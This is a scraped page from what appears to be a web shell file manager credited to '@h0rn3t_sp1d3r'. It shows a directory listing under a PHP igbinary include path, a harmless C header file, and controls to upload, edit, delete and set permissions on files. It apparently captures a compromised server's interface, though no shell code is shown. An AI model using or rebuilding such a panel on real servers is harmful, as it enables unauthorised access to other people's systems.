📁 File Manager By @h0rn3t_sp1d3r
📂 Change Directory:
Go
/
/
opt
/
alt
/
php53
/
usr
/
include
/
php
/
ext
/
igbinary
/
[ HOME ]
⬅️ [ PARENT DIR ]
📤 Upload
#ifndef PHPEXT_IGBINARY_BASE_IGBINARY_H #define PHPEXT_IGBINARY_BASE_IGBINARY_H #include "php_version.h" #if PHP_MAJOR_VERSION == 5 #include "src/php5/igbinary.h" #elif PHP_MAJOR_VERSION == 7 #include "src/php7/igbinary.h" #else #error "Unsupported php version for igbinary build" #endif #endif
💾 Save
Name
Size (kB)
Modified
Year
Perms
Actions
📁 ..
-
2026-03-19 16:17:52
2026
Set
-
📁 src
-
2024-05-04 23:43:24
2024
Set
-
📄 igbinary.h
0.29
2024-02-15 21:31:09
2024
Set
✏️ Edit
|
🗑️
|
⬇️
|
✏️
📄 php_igbinary.h
0.86
2024-02-15 21:31:09
2024
Set
✏️ Edit
|
🗑️
|
⬇️
|
✏️